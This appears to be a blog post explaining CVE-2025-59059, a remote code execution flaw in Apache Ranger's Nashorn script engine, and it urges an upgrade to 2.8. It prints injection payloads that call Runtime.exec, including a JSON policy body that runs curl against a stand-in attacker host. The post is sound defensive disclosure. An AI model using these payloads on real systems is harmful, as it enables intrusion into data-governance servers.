A critical vulnerability, tracked as CVE-2025-59059, was discovered in the Apache Ranger project, specifically in the NashornScriptEngineCreator component. This remote code execution (RCE) flaw affects all Apache Ranger versions up to and including 2.7. If you are running one of these vulnerable versions, upgrade to Ranger 2.8., which patches the vulnerability.

In this post, we'll break down what went wrong, how attackers can exploit the issue, what the relevant code looks like, and how you can protect your systems.

What is Apache Ranger?

Apache Ranger provides comprehensive security for data access across the Apache Hadoop ecosystem. It delivers centralized authentication, authorization, and auditing solutions for Hadoop, Hive, HBase, and more. Ranger allows administrators to define and enforce security policies for various data sources.

Vulnerability Details

NashornScriptEngineCreator provides scripting capabilities by integrating the Nashorn JavaScript engine. Under certain configurations, it does not properly sanitize code that is passed to it, allowing remote attackers to inject and execute arbitrary JavaScript, which in turn can execute arbitrary Java code.

Exploitable Component

import javax.script.ScriptEngine;
import javax.script.ScriptEngineManager;

public class NashornScriptEngineCreator {
    public ScriptEngine create() {
        // Looks up the JDK's Nashorn engine by name. An engine obtained this way
        // has no ClassFilter and no "--no-java" option, so any script it evaluates
        // can reach arbitrary JVM classes, including java.lang.Runtime.
        ScriptEngineManager manager = new ScriptEngineManager();
        return manager.getEngineByName("nashorn");
    }
}

In vulnerable versions, script text supplied through a REST endpoint or in policy conditions is handed to this engine without sanitization, so it can drive the script engine and reach arbitrary code execution.

How Attackers Can Exploit CVE-2025-59059

Suppose Ranger is configured to evaluate custom JavaScript expressions via exposed endpoints (such as policy condition evaluation). Malicious users can input specially crafted scripts.

Example Attack Payload

The following Nashorn script, inserted into a policy condition, triggers Java code execution.

var p = java.lang.Runtime.getRuntime().exec("id");

If this payload is evaluated, the backend Java process will execute the OS id command, returning user information. Attackers can chain such commands for further exploitation, including deploying web shells, stealing credentials, or pivoting across systems.

Let's see what a simplified exploit might look like in JavaScript:

// Exploiting Nashorn to execute OS commands
var process = java.lang.Runtime.getRuntime().exec('touch /tmp/ranger_compromised');

When this is passed to a vulnerable Ranger setup, the server will create a file at /tmp/ranger_compromised—demonstrating full code execution.

Imagine posting the following JSON to the policy API:

{
  "conditions": [
    {
      "type": "custom",
      "script": "java.lang.Runtime.getRuntime().exec(\"curl http://attacker-server/pwned\")"
    }
  ]
}

If the server is vulnerable, it will fetch the attacker's URL, showing remote command execution is possible.

References

- NVD – CVE-2025-59059 *(link may be updated upon official registration)*
- Apache Ranger Security Advisories
- JDK Nashorn Documentation

How to Fix

Upgrade immediately to Apache Ranger 2.8., which completely disables unsafe script evaluation and adds strict input controls.

Conclusion

CVE-2025-59059 is serious: it allows remote, unauthenticated code execution, which can lead to full system compromise. If you're using Apache Ranger 2.7. or earlier, upgrade to 2.8. immediately. There is no safe workaround short of disabling scripting altogether.

Be proactive. Stay secure.

For more details and updates, check the official Apache Ranger Security Page.

Timeline

Published on: 03/03/2026 10:44:47 UTC
Last modified on: 03/03/2026 15:16:15 UTC